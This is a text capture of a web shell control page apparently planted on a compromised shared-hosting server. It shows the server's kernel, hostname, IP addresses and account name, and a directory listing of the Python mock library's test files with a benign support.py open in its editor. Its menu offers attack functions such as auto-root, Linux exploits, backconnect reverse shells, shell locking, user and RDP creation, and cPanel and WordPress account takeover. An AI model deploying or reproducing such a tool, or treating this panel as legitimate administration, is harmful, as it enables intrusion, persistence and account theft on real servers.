Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
mock /
mock /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
146
B
-rw-r--r--
__main__.py
623
B
-rw-r--r--
support.py
552
B
-rw-r--r--
testcallable.py
4.33
KB
-rw-r--r--
testhelpers.py
28.02
KB
-rw-r--r--
testmagicmethods.py
16
KB
-rw-r--r--
testmock.py
49.29
KB
-rw-r--r--
testpatch.py
55.03
KB
-rw-r--r--
testsentinel.py
976
B
-rw-r--r--
testwith.py
10.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : support.py
import sys info = sys.version_info import unittest2 try: callable = callable except NameError: def callable(obj): return hasattr(obj, '__call__') with_available = sys.version_info[:2] >= (2, 5) def is_instance(obj, klass): """Version of is_instance that doesn't access __class__""" return issubclass(type(obj), klass) class SomeClass(object): class_attribute = None def wibble(self): pass class X(object): pass try: next = next except NameError: def next(obj): return obj.next()
Close